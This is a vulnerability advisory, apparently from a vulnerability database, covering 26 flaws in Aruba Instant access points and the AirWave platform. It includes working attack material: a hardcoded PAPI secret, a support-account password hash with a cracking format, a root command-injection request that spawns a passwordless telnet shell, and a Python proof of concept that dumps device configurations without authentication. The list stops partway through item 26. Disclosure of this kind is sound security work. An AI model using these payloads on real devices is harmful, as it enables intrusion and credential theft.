var-202001-1251
Vulnerability from variot
Multiple vulnerabilities exists in Aruba Instate before 4.1.3.0 and 4.2.3.1 due to insufficient validation of user-supplied input and insufficient checking of parameters, which could allow a malicious user to bypass security restrictions, obtain sensitive information, perform unauthorized actions and execute arbitrary code. Aruba Instant There is an input verification vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Multiple Arubanetworks Products are prone to multiple security vulnerabilities. Failed exploit attempts will likely result in denial-of-service conditions. Following products and versions are affected: ArubaOS (all versions) are vulnerable. AirWave Management Platform 8.x prior to 8.2 are vulnerable. Aruba Instant (all versions up to, but not including, 4.1.3.0 and 4.2.3.1) are vulnerable. The Vulnerabilities were discovered during a black box security assessment and therefore the vulnerability list should not be considered exhaustive. Several of the high severity vulnerabilities listed in this report are related to the Aruba proprietary PAPI protocol and allow remote compromise of affected devices. AMP: RabbitMQ Management interface exposed 2. AMP: XSRF token uses weak calculation algorithm 3. AMP: Arbitrary modification of /etc/ntp.conf 4. AMP: PAPI uses static key for calculating validation checksum (auth bypass) 5. (I)AP: Insecure transmission of login credentials (GET) 6. (I)AP: Built in privileged "support" account 7. (I)AP: Static password hash for support account 8. (I)AP: Unusual account identified ("arubasecretadmin") 9. (I)AP: Privileged remote code execution 10. (I)AP: Radius passwords allow arbitrary raddb commands 11. (I)AP: Unauthenticated disclosure of environment variables 12. (I)AP: Information disclosure by firmware checking functionality 13. (I)AP: Unauthenticated automated firmware update requests 14. (I)AP: Firmware updater does not check certificates 15. (I)AP: Forceful downgrade of FW versions possible 16. (I)AP: Firmware update check discloses machine certificate 17. (I)AP: Firmware is downloaded via unencrypted connection 18. (I)AP: Firmware update Challenge/Response does not protect the Client 19. (I)AP: Unencrypted private keys and certs 20. (I)AP: Potential signature private key 21. (I)AP: PAPI Endpoints exposed to all interfaces 22. (I)AP: PAPI Endpoint does not validate MD5 signatures 23. (I)AP: PAPI protocol encrypted with weak encryption algorithm 24. (I)AP: PAPI protocol authentication bypass 25. (I)AP: Broadcast with detailed system information (LLDP) 26. (I)AP: User passwords are encrypted with a static key
Vulnerability Details
1. AMP: RabbitMQ Management interface exposed
AMPs expose the management frontend for the RabbitMQ message queue on all interfaces via tcp/15672 and tcp/55672.
# netstat -nltp | grep beam tcp 0 0 127.0.0.1:5672 0.0.0.0: LISTEN 2830/beam.smp tcp 0 0 127.0.0.1:17716 0.0.0.0: LISTEN 2830/beam.smp tcp 0 0 0.0.0.0:15672 0.0.0.0: LISTEN 2830/beam.smp tcp 0 0 0.0.0.0:55672 0.0.0.0: LISTEN 2830/beam.smp
The password for the default user "airwave" is stored in the world readable file /etc/rabbitmq/rabbitmq.config in plaintext:
# ls -l /etc/rabbitmq/rabbitmq.config -rw-r--r-- 1 root root 275 Oct 28 15:48 /etc/rabbitmq/rabbitmq.config # grep default_ /etc/rabbitmq/rabbitmq.config {default_user,<<"airwave">>}, {default_pass,<<"REMOVED">>}
2. AMP: XSRF token uses weak calculation algorithm
The XSRF token is calculated based on limited sources of entropy, consisting of the user's time of login and a random number between 0 and 99999. The algorithm Is approximated by the following example Python script:
base64.b64encode(hashlib.md5('%d%5.5d' % (int(time.time()), random.randint(0,99999))).digest())
3. AMP: Arbitrary modification of /etc/ntp.conf
Incorrect/missing filtering of input parameters allows injecting new lines and arbitrary commands into /etc/ntp.conf, when updating the NTP settings via the web frontend.
POST /nf/pref_network? HTTP/1.1 Host: 192.168.131.162 [...]
id=&ip_1=192.168.131.162&hostname_1=foo.example.com& subnet_mask_1=255.255.255.248&gateway_1=192.168.131.161&dns1_1=172.16.255.1& dns2_1=ð1_enabled_1=0ð1_ip_1=ð1_netmask_1=& ntp1_1=time1.example.com%0afoo&ntp2_1=time2.example.com&save=Save
The above POST requests results in the following ntp.conf being generated:
# cat /etc/ntp.conf [...] server time1.example.com foo server time2.example.com
4. AMP: PAPI uses static key for calculating validation checksum (auth bypass)
PAPI packets sent from an AP to an AMP are authenticated with a cryptographic checksum. The packet format is only partially known, as it's a proprietary format created by Aruba. A typical PAPI packet sent to an AMP is as follows:
0000 49 72 00 02 64 69 86 2d 7f 00 00 01 01 00 01 00 Ir..di.-........ 0010 20 1f 20 1e 00 01 00 00 00 01 3e f9 22 49 05 b3 . .......>."I.. 0020 50 89 40 d3 5d 9d d6 af 46 98 c1 a6 P.@.]...F...
The following dissection of the above shown packet gives a more detailed overview of the format:
49 72 ID 00 02 Version 64 69 86 2d PAPI Destination IP 7f 00 00 01 PAPI Source IP 01 00 Unknown1 01 00 Unknown2 20 1f PAPI Source Port 20 1e PAPI Destination Port 00 01 Unknown3 00 00 Unknown4 00 01 Sequence Number 3e f9 Unknown5 22 49 05 b3 50 89 40 d3 5d 9d d6 af 46 98 c1 a6 Checksum
The checksum is based on a MD5 hash of a padded concatenation of all fields and a secret token. The secret token is hardcoded in multiple binaries on the AMP and can easily be retrieved via core Linux system tools:
$ strings /opt/airwave/bin/msgHandler | grep asd asdf;lkj763
Using this secret token it is possible to craft valid PAPI packets and issue commands to the AMP, bypassing the authentication based on the shared secret / token. This can be exploited to compromise of the device. Random sampling of different software versions available on Aruba's website confirmed that the shared secret is identical for all versions.
5. AP: Insecure transmission of login credentials (GET)
Username and password to authenticate with the AP web frontend are transmitted through HTTP GET. This method should not be used in a form that transmits sensitive data, because the data is displayed in clear text in the URL.
GET /swarm.cgi?opcode=login&user=admin&passwd=admin HTTP/1.1
The login URL can potentially appear in Proxy logs, the server logs or browser history. This possibly discloses the authentication data to unauthorized persons.
6. AP: Built in privileged "support" account
The APs provide a built in system account called "support". When connected to the restricted shell of the AP via SSH, issuing the command "support", triggers a password request:
00:0b:86:XX:XX:XX# support Password:
A quick internet search clarified, that this password is meant for use by Aruba engineers only: http://community.arubanetworks.com/t5/Unified-Wired-Wireless-Access/OS5-0-support-password/td-p/26760
Further research on that functionality lead to the conclusion that this functionality provides root-privileged shell access to the underlying operating system of the AP, given the correct password is entered.
7. AP: Static password hash for support account
The password hash for the "support" account mentioned in vulnerability #6 is stored in plaintext on the AP.
$ strings /aruba/bin/cli | grep ^bc5 bc54907601c92efc0875233e121fd3f1cebb8b95e2e3c44c14
Random sampling of different versions of Firmware images available on Aruba's website confirmed that the password hash is identical for all versions. The password check validating a given "support" password is based on the following algorithm:
SALT + sha1(SALT + PASSWORD)
Where SALT equals the first 5 bytes of the password hash in binary representation. It is possible to run a brute-force attack on this hash format using JtR with the following input format:
support:$dynamic_25$c92efc0875233e121fd3f1cebb8b95e2e3c44c14$HEX$bc54907601
8. AP: Unusual account identified ("arubasecretadmin")
The AP's system user configuration contains a undocumented account called "arubasecretadmin". This account was the root cause for CVE-2007-0932 and allowed administrative login with a static password.
/etc/passwd: nobody:x:99:99:Nobody:/:/sbin/nologin root:x:0:0:Root:/:/bin/sh admin:x:100:100:Admin:/:/bin/telnet3 arubasecretadmin:x:101:100:Aruba Admin:/:/bin/telnet2 serial:x:102:100:Serial:/:/bin/telnet4
Further tests indicated that login with this account seems not possible as it is not mapped through Arubas authentication mechanisms. The reason for it being still configured on the system is unknown.
9. AP: Privileged remote code execution
Insufficient checking of parameters allows an attacker to execute commands with root privileges on the AP. The vulnerable parameter is "image_url" which is used in the Firmware update function.
GET /swarm.cgi?opcode=image-url-upgrade&ip=127.0.0.1&oper_id=6&image_url=Aries@http://10.0.0.1/?"/usr/sbin/mini_httpd+-d+/+-u+root+-p+1234+-C+/etc/mini_httpd.conf
"&auto_reboot=false&refresh=true&sid=OWsiU5MM7DxVf9FRWe3P&nocache=0.9368100591919084
HTTP/1.1
The above example starts a new instance of mini_httpd on tcp/1234, which allows browsing the AP's filesystem. The following list of commands, if executed in order, start a telnet service that allows passwordless root login.
killall -9 utelnetd touch /tmp/telnet_enable echo #!/bin/sh > /bin/login echo /bin/sh >> /bin/login chmod +x /bin/login /sbin/utelnetd
Connecting to the telnet service started by the above command chain:
# telnet 10.0.XX.XX Trying 10.0.XX.XX... Connected to 10.0.XX.XX. Escape character is '^]'. Switching to Full Access /aruba/bin # echo $USER root /aruba/bin #
Potential exploits of this vulnerability can be detected through the
AP's log file:
[...]
Jan 1 02:43:47 cli[2052]: <341004> |AP
00:0b:86:XX:XX:XX2@10.0.XX.XX cli|
http://10.0.XX.XX/?"/sbin/utelnetd
"
[...]
10. AP: Radius passwords allow arbitrary raddb commands
Insufficient checking of the GET parameter "cmd" allows the injection of arbitrary commands and configuration parameters in the raddb configuration.
Example: GET /swarm.cgi?opcode=config&ip=127.0.0.1&cmd=%27user%20foo%20foo%22,my-setting%3d%3d%22blah%20portal%0Ainbound-firewall%0Ano%20rule%0Aexit%0A%27&refresh=false&sid=Lppj9jT2xQmYKqjEx5eP&nocache=0.10862623626107548 HTTP/1.1
/aruba/radius/raddb/users: foo Filter-Id == MAC-GUEST, Cleartext-Password := "foo",my-setting=="blah"
As shown in the above example, inserting a double-quote in the password allows to add additional commands after the password.
11. AP: Unauthenticated disclosure of environment variables
It is possible to request a listing of environment variables by requesting a specific URL on the AP's web server. The request does not require authentication.
GET /swarm.cgi?opcode=printenv HTTP/1.1
HTTP/1.0 200 OK Content-Type:text/plain; charset=utf-8 Pragma: no-cache Cache-Control: max-age=0, no-store
Environment variables
CHILD_INDEX=0 PATH=/usr/local/bin:/usr/ucb:/bin:/usr/bin LD_LIBRARY_PATH=/usr/local/lib:/usr/lib SERVER_SOFTWARE= SERVER_NAME=10.0.XX.XX GATEWAY_INTERFACE=CGI/1.1 SERVER_PROTOCOL=HTTP/1.0 SERVER_PORT=4343 REQUEST_METHOD=GET SCRIPT_NAME=/swarm.cgi QUERY_STRING=opcode=printenv REMOTE_ADDR=10.0.XX.XX REMOTE_PORT=58804 HTTP_REFERER=https://10.0.XX.XX:4343/ HTTP_USER_AGENT=Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.3.0 HTTP_HOST=10.0.XX.XX:4343
12. AP: Information disclosure by firmware checking functionality
When the AP checks device.arubanetworks.com for a new firmware version, it sends detailed information of the AP in plaintext to the remote host.
POST /firmware HTTP/1.1 Host: device.arubanetworks.com Content-Length: 2 Connection: keep-alive X-Type: firmware-check X-Guid: 2dbe42XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X-OEM-Tag: Aruba X-Mode: IAP X-Factory-Default: Yes X-Current-Version: 6.4.2.6-4.1.1.10_51810 X-Organization: REMOVED (Company Internal Name) X-Ap-Info: CC00XXXXX, 00:0b:86:XX:XX:XX, RAP-155 X-Features: 0000100001001000000000000000000000000000000000010000000
13. AP: Unauthenticated automated firmware update requests
The web frontend of the AP provides functionality to initiate an automated firmware update. Doing so triggers the AP to initiate communication with device.arubanetworks.com and automatically download and install a new firmware image. The CGI opcode for that automatic update is "image-server-check" and it was discovered that the "sid" parameter is not checked for this opcode. Therefor an attacker can issue the automatic firmware update without authentication by sending the following GET request to the AP.
GET /swarm.cgi?opcode=image-server-check&ip=127.0.0.1&sid=x
As shown above, the "sid" parameter has to be submitted as part of the URL, but can be set to anything. Although all opcode actions follow the same calling scheme, "image-server-check" was the only opcode where the session ID was not validated.
Combined with other vulnerabilities (#14, #15), this could be exploited to install an outdated, vulnerable firmware on the AP.
14. AP: Firmware updater does not check certificates
The communication between AP and device.arubanetworks.com is secured by using SSL. The AP does not do proper certificate validation for the communication to device.arubanetworks.com. A typical SSL MiTM attack using DNS spoofing and a self-signed certificate allowed interception of the traffic between AP and device.arubanetworks.com.
15. AP: Forceful downgrade of FW versions possible
When checking device.arubanetworks.com for a new firmware image, the AP sends it's current version to the remote host. If there is no new firmware available, device.arubanetworks.com does not provide any download options. If the initial version sent from the AP is modified by an attacker (via MiTM), the remote server will reply with the current firmware version. The AP will then reject that firmware, as it's current version is more recent/the same. Downgrading the version does also not work based on the validation the AP does. This behaviour can be overwritten if an attacker intercepts and modifies the reply from device.arubanetworks.com and adds X-header called "X-Mandatory-Upgrade".
Example of a spoofed reply from device.arubanetworks.com:
HTTP/1.0 200 OK Date: Wed, 11 Nov 2015 12:12:20 GMT Content-Length: 91 Content-Type: text/plain; charset=UTF-8 X-Activation-Key: FXXXXXXX X-Session-Id: 05d607dd-958b-42c4-a355-bd54e1a32e8e X-Status-Code: success X-Type: firmware-check X-Mandatory-Upgrade: true Connection: close
6.4.2.6-4.1.1.10_51810 23 http://10.0.0.1:4321/ArubaInstant_Aries_6.4.2.6-4.1.1.10_51810
As shown above, the Header "X-Mandatory-Upgrade" was added to the server's reply. This causes the AP to skip its validation checks and accept any firmware version provided, regardless if it is the same or older than the current one.
16. AP: Firmware update check discloses machine certificate
While observing the traffic between an AP and device.arubanetworks.com, it was discovered that the AP discloses it's machine certificate to the remote endpoint.
POST /firmware HTTP/1.1 Host: 10.0.XX.XX Content-Length: 2504 Connection: close X-Type: firmware-check X-Guid: 2dbe42XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X-OEM-Tag: Aruba X-Mode: IAP X-Factory-Default: Yes X-Session-Id: e0b24fb1-e2f7-4e06-9473-1266b50a3fec X-Current-Version: 6.4.2.6-4.1.1.10_51810 X-Organization: REMOVED (Company Internal Name) X-Ap-Info: CC00XXXXX, 00:0b:86:XX:XX:XX, RAP-155 X-Features: 0000100001001000000000000000000000000000000000010000000 X-Challenge-Hash: SHA-1
-----BEGIN CERTIFICATE----- MIIGTjCCBTagAwI... [...] -----END CERTIFICATE-----
The certificate sent in the above request is the same (in PEM format) as found under the following path on the AP:
/tmp/deviceCerts/certifiedKeyCert.der
Comparison of the certificate from the HTTP Request and from the AP filesystem:
$ sha256sum dumped-fw-cert.txt certifiedKeyCert.der.pem 68ebb521dff53d8dcb8e4a0467dcae38cf45a0d812897393632bdd9ef6f354e8 dumped-fw-cert.txt 68ebb521dff53d8dcb8e4a0467dcae38cf45a0d812897393632bdd9ef6f354e8 certifiedKeyCert.der.pem
17. AP: Firmware is downloaded via unencrypted connection
Firmware images are downloaded via unencrypted HTTP to the AP. An example reply containing the download paths looks as follows:
HTTP/1.1 200 OK Date: Wed, 11 Nov 2015 13:18:58 GMT Content-Length: 552 Content-Type: text/plain; charset=UTF-8 X-Activation-Key: FXXXXXXX X-Session-Id: 05d607dd-958b-42c4-a355-bd54e1a32e8e X-Status-Code: success X-Type: firmware-check Connection: close
6.4.2.6-4.1.1.10_51810 25 http://images.arubanetworks.com/fwfiles/ArubaInstant_Centaurus_6.4.2.6-4.1.1.10_51810 30 http://images.arubanetworks.com/fwfiles/ArubaInstant_Taurus_6.4.2.6-4.1.1.10_51810 15 http://images.arubanetworks.com/fwfiles/ArubaInstant_Cassiopeia_6.4.2.6-4.1.1.10_51810 10 http://images.arubanetworks.com/fwfiles/ArubaInstant_Orion_6.4.2.6-4.1.1.10_51810 23 http://images.arubanetworks.com/fwfiles/ArubaInstant_Aries_6.4.2.6-4.1.1.10_51810 26 http://images.arubanetworks.com/fwfiles/ArubaInstant_Pegasus_6.4.2.6-4.1.1.10_51810
An attacker could potentially MiTM connections to images.arubanetworks.com and possibly replace the firmware images downloaded by the AP.
18. AP: Firmware update Challenge/Response does not protect the Client
The update check process between AP and device.arubanetworks.com works as follows:
AP => device.arubanetworks.com POST /firmware X-Type: firmware-check
AP <= device.arubanetworks.com 200 OK X-Session-Id: bd4... X-Challenge: 123123...
AP => device.arubanetworks.com POST /firmware X-Session-Id: bd4...
[machine certificate] [signature]
AP <= device.arubanetworks.com 200 OK X-Session-Id: bd4...
[firmware image urls]
When inspecting the communication process carefully, it is clear that the final response from device.arubanetworks.com does not contain any (cryptographic) signature. An attacker could impersonate device.arubanetworks.com, send an arbitrary challenge, ignore the response and just reply with a list of firmware images. The only thing that has to be kept the same over requests is the X-Session-Id header, which is also sent initially by the remote host and not the AP and therefore under full control of the attacker.
19. AP: Unencrypted private keys and certs
The AP firmware image contains the unencrypted private key and certificate for securelogin.arubanetworks.com issued by GeoTrust and valid until 2017. The key and cert was found under the path /aruba/conf/cpprivkey.pem.
$ openssl x509 -in cpprivkey.pem -text -noout Certificate: Data: Version: 3 (0x2) Serial Number: 121426 (0x1da52) Signature Algorithm: sha1WithRSAEncryption Issuer: C=US, O=GeoTrust Inc., OU=Domain Validated SSL, CN=GeoTrust DV SSL CA Validity Not Before: May 11 01:22:10 2011 GMT Not After : Aug 11 04:40:59 2017 GMT Subject: serialNumber=lLUge2fRPkWcJe7boLSVdsKOFK8wv3MF, C=US, O=securelogin.arubanetworks.com, OU=GT28470348, OU=See www.geotrust.com/resources/cps (c)11, OU=Domain Control Validated - QuickSSL(R) Premium, CN=securelogin.arubanetworks.com [...]
$ openssl rsa -in cpprivkey.pem -check RSA key ok writing RSA key -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEA…. [...] -----END RSA PRIVATE KEY-----
20. AP: Potential signature private key
A potential SSL key was found under the path /etc/sig.key. Based on the header (3082xxxx[02,03]82), the file looks like a SSL key in DER format:
$ xxd etc/sig.key 00000000: 3082 020a 0282 0201 00d9 2d71 db0f decb 0.........-q....
It was not possible to decode the key. Therefore it's not 100% clear if is an actual key or just a garbaged file.
21. AP: PAPI Endpoints exposed to all interfaces
The PAPI endpoint "msgHandler" creates listeners on all interfaces. Therefore it is reachable via wired and wireless connections to the AP. This increases the potential attack surface.
# netstat -nlu | grep :82 udp 0 0 :::8209 ::: udp 0 0 :::8211 :::
Additionally the local ACL table of the AP contains a default firewall rule, permitting any traffic to udp/8209-8211, overwriting any manually set ACL to block access to PAPI:
00:0b:86:XX:XX:XX# show datapath acl 106 Datapath ACL 106 Entries
Flags: P - permit, L - log, E - established, M/e - MAC/etype filter S - SNAT, D - DNAT, R - redirect, r - reverse redirect m - Mirror I - Invert SA, i - Invert DA, H - high prio, O - set prio, C - Classify Media A - Disable Scanning, B - black list, T - set TOS, 4 - IPv4, 6 - IPv6 K - App Throttle, d - Domain DA
1: any any 17 0-65535 8209-8211 P4 [...] 12: any any any P4 00:0b:86:XX:XX:XX#
22. AP: PAPI Endpoint does not validate MD5 signatures
MD5 signature validation for incoming PAPI packets is disabled on the AP:
# ps | grep msgHandler 1988 root 508 S < /aruba/bin/msgHandler -n
# /aruba/bin/msgHandler -h usage: msgHandler [-d] [-n] -d = enable debug prints. -n = disable md5 signatures. -g = disable garbling.
The watchdog service ("nanny") also restarts the PAPI handler with disabled MD5 signature validation:
# grep msgH /aruba/bin/nanny_list RESTART /aruba/bin/msgHandler -n
23. AP: PAPI protocol encrypted with weak encryption algorithm
PAPI packets sent to an AP contain an encrypted payload. The encryption seems to replace the MD5 signature check as described in #4 and used when PAPI is sent from AP to AMP. This might also explain why the PAPI endpoint runs with disabled MD5 signature verification on the AP (see #22).
The following example shows an encrypted PAPI packet for the command "show version" as received by the AP:
0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............ 0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ........... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 00 00 00 00 00 00 00 00 00 00 97 93 93 93 ................ 0050 a9 97 93 93 92 6e 96 99 93 93 92 95 94 91 93 97 .....n.......... 0060 93 93 93 93 93 93 87 e9 eb e1 fc d0 dc c6 e4 fd ................ 0070 fa e1 f7 e9 d1 a6 f7 e7 c5 eb f1 93 93 9e e0 fb ................ 0080 fc e4 b3 e5 f6 e1 e0 fa fc fd 99 ...........
Important parts of the above packet:
7f 00 00 01 Destination IP (127.0.0.1) 0a 00 00 01 Source IP (10.0.0.1) 3b 60 Destination Port (15200) 3b 7e Source Port (15230) 97 93 93 93-EOF Encrypted PAPI payload
Comparison of the above packet with a typical PAPI packet that is sent from the AP to the AMP quickly highlights the missing 0x00 that are used to pad certain fields of the PAPI payload. These 0x00 seem to be substituted with 0x93, which is a clear indication that the payload is "encrypted" with a 1 byte XOR. As XOR'ing 0x00 with 1 byte results in the same byte, the payload therefore discloses the key used and use of the weak XOR algorithm:
0x00: 00000000
^ 0x93: 10010011 ================ 10010011 (0x93)
The following shows the above PAPI packet for "show version" with its payload decrypted:
0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............ 0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ........... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................ 0050 3a 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04 :............... 0060 00 00 00 00 00 00 14 7a 78 72 6f 43 4f 55 77 6e .......zxroCOUwn 0070 69 72 64 7a 42 35 64 74 56 78 62 00 00 0d 73 68 irdzB5dtVxb...sh 0080 6f 77 20 76 65 72 73 69 6f 6e 0a ow version.
(The string starting with "zxr..." is a HTTP session ID, see #25 on details how to bypass this).
An example Python function for en-/decrypting PAPI payloads could look like this:
def aruba_encrypt(s): return ''.join([chr(ord(c) ^ 0x93) for c in s])
24. AP: PAPI protocol authentication bypass
Besides it's typical use between different Aruba devices, PAPI is also used as an inter-process communication (IPC) mechanism between the CGI based web frontend and the backend processes on the AP. Certain commands that can be sent via PAPI are only supposed to be used via this IPC interface and not from an external source. Besides the weak "encryption" that is described in #23, some PAPI packets contain a HTTP session ID (SID), that matches the SID issued at login to the web frontend.
Example IPC packet (payload decrypted as shown in #23):
0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............ 0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ........... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................ 0050 40 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04 @............... 0060 00 00 00 00 00 00 14 7a 78 72 6f 43 4f 55 77 6e .......zxroCOUwn 0070 69 72 64 7a 42 35 64 74 56 78 62 00 00 13 73 68 irdzB5dtVxb...sh 0080 6f 77 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e ow configuration 0090 0a .
The SID in the example shown is "zxroCOUwnirdzB5dtVxb". The 0x14 before that indicates the length of the 20 byte SID. If the session is expired or an invalid session is specified, the packet is rejected by the PAPI endpoint (msgHandler).
Replacing the 20 byte SID with 20 * 0x00, bypasses the SID check and therefore allows unauthenticated PAPI communication with the AP.
Example IPC packet (Session ID replaced with 20 * 0x00, payload not XOR'ed for readability):
0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............ 0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ........... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................ 0050 40 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04 @............... 0060 00 00 00 00 00 00 14 00 00 00 00 00 00 00 00 00 ................ 0070 00 00 00 00 00 00 00 00 00 00 00 00 00 13 73 68 ..............sh 0080 6f 77 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e ow configuration 0090 0a
Using the above example, it is possible to request the system configuration from an AP, bypassing all authentication methods.
If the above packet is sent using IPC from the webfrontend cgi to the backend, (localhost) the reply looks like follows:
msg_ref 303 /tmp/.cli_msg_SW9iVE
The cgi binary then reads this file and renders the content in the HTTP reply. If the PAPI packet comes from an external address (instead of localhost) the reply points to the APs web server (10.0.0.26 in this case) instead of /tmp/:
msg_ref 2689 http://10.0.0.26/.cli_msg_n011xh
Access to this file does not require authentication which raises the severity of this vulnerability significantly.
The following Python script is a proof of concept for this vulnerability, sending a "show configuration" packet to an AP with the IP address 10.0.0.26:
import socket def aruba_encrypt(s): return ''.join([chr(ord(c) ^ 0x93) for c in s]) header = ( '\x49\x72\x00\x03\x7f\x00\x00\x01\x0a\x00\x00\x01\x00\x00\x20\x13' '\x3b\x60\x3b\x7e\x20\x04\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' ) payload = ( # show configuration '\x04\x00\x00\x00\x40\x04\x00\x00\x01\xfd\x05\x0a\x00\x00\x01\x06' '\x07\x02\x00\x04\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x13\x73\x68\x6f\x77\x20\x63\x6f\x6e\x66\x69\x67\x75\x72\x61' '\x74\x69\x6f\x6e\x0a' ) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.bind(('', 1337)) sock.sendto(header + aruba_encrypt(payload), ('10.0.0.26', 8211)) buff = sock.recvfrom(4096) print aruba_encrypt(buff[0])
Executing the above PoC:
# python arupapi.py [...]msg_ref 2689 http://10.0.0.26/.cli_msg_n011xh
Downloading the file referenced by the reply returns the full AP configuration, including all users, passwords and settings (no auth is required on the HTTP request either):
# curl -Lk http://10.0.0.26/.cli_msg_n011xh version 6.4.2.0-4.1.1 virtual-controller-country XX virtual-controller-key b49ffREMOVED name instant-XX:XX:XX terminal-access clock timezone none 00 00 rf-band all [...] mgmt-user admin f9ac59cd431e174fb07539a8a811a1aa [...] (full configuration file continues)
For APs running in "managed mode", the above shown exploit does not work. The reason for that is, that these APs don't provide a web server and have only a limited set of commands that can be executed via PAPI.
Additionally, APs in managed mode do not seem to use the XOR based "encryption" or MD5 checksums - there was no authentication/encryption found at all.
One interesting payload for APs in "managed mode" using the limited subset of available commands is the ability to capture traffic and send it to a remote endpoint via UDP. The example command on the controller would be:
(aruba_7030_1) #ap packet-capture raw-start ip-addr 192.168.0.1 100.105.134.45 1337 0 radio 0
This command would send all traffic of AP 192.168.0.1 from the first radio interface in PCAP format to 100.105.134.45:1337. Wrapped in PAPI, the Packet would look like this:
0000 49 72 00 03 c0 a8 00 01 7f 00 00 01 00 00 00 00 Ir.............. 0010 20 21 20 1c 20 04 01 48 14 08 36 b1 00 00 00 00 ! . ..H..6..... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 65 ...............e 0050 78 65 63 75 74 65 43 6f 6d 6d 61 6e 64 4f 62 6a xecuteCommandObj 0060 65 63 74 02 06 02 04 03 00 08 03 00 08 00 00 04 ect............. 0070 38 32 32 35 02 06 02 04 00 00 00 03 00 00 02 00 8225............ 0080 02 01 04 00 00 00 08 00 00 02 41 50 00 00 02 41 ..........AP...A 0090 50 00 00 0e 50 41 43 4b 45 54 2d 43 41 50 54 55 P...PACKET-CAPTU 00a0 52 45 00 00 0e 50 41 43 4b 45 54 2d 43 41 50 54 RE...PACKET-CAPT 00b0 55 52 45 00 00 09 52 41 57 2d 53 54 41 52 54 00 URE...RAW-START. 00c0 00 09 52 41 57 2d 53 54 41 52 54 00 00 07 49 50 ..RAW-START...IP 00d0 2d 41 44 44 52 00 00 0b 31 39 32 2e 31 36 38 2e -ADDR...192.168. 00e0 30 2e 31 00 00 09 74 61 72 67 65 74 2d 69 70 00 0.1...target-ip. 00f0 00 0e 31 30 30 2e 31 30 35 2e 31 33 34 2e 34 35 ..100.105.134.45 0100 00 00 0b 74 61 72 67 65 74 2d 70 6f 72 74 00 00 ...target-port.. 0110 04 31 33 33 37 00 00 06 66 6f 72 6d 61 74 00 00 .1337...format.. 0120 01 30 00 00 05 52 41 44 49 4f 00 00 01 30 04 00 .0...RADIO...0.. 0130 00 00 00 02 00 02 01 02 00 02 00 00 00 04 73 65 ..............se 0140 63 61 00 00 04 72 6f 6f 74 ca...root
When sending this packet to an AP running in managed mode, it confirms the command and starts sending traffic to the specified host:
[...]1
25. AP: Broadcast with detailed system information (LLDP)
Aruba APs broadcast detailed system and version information to the wired networks via LLDP (Link Layer Discovery Protocol).
0000 02 07 04 00 0b 86 9e 7a 32 04 07 03 00 0b 86 9e .......z2....... 0010 7a 32 06 02 00 78 0a 11 30 30 3a 30 62 3a 38 36 z2...x..00:0b:86 0020 3a XX XX 3a XX XX 3a XX XX 0c 3a 41 72 75 62 61 :XX:XX:XX.:Aruba 0030 4f 53 20 28 4d 4f 44 45 4c 3a 20 52 41 50 2d 31 OS (MODEL: RAP-1 0040 35 35 29 2c 20 56 65 72 73 69 6f 6e 20 36 2e 34 55), Version 6.4 0050 2e 32 2e 36 2d 34 2e 31 2e 31 2e 31 30 20 28 35 .2.6-4.1.1.10 (5 0060 31 38 31 30 29 0e 04 00 0c 00 08 10 0c 05 01 0a 1810)........... 0070 00 00 22 02 00 00 00 0e 00 08 04 65 74 68 30 fe .."........eth0. 0080 06 00 0b 86 01 00 01 fe 09 00 12 0f 03 00 00 00 ................ 0090 00 00 fe 09 00 12 0f 01 03 6c 03 00 10 fe 06 00 .........l...... 00a0 12 0f 04 06 76 00 00 ....v..
The broadcast packet contains the APs MAC address, model number and exact firmware version.This detailed information could aid an attacker to easily find and identify potential targets for known vulnerabilities.
26. AP: User passwords are encrypted with a static key
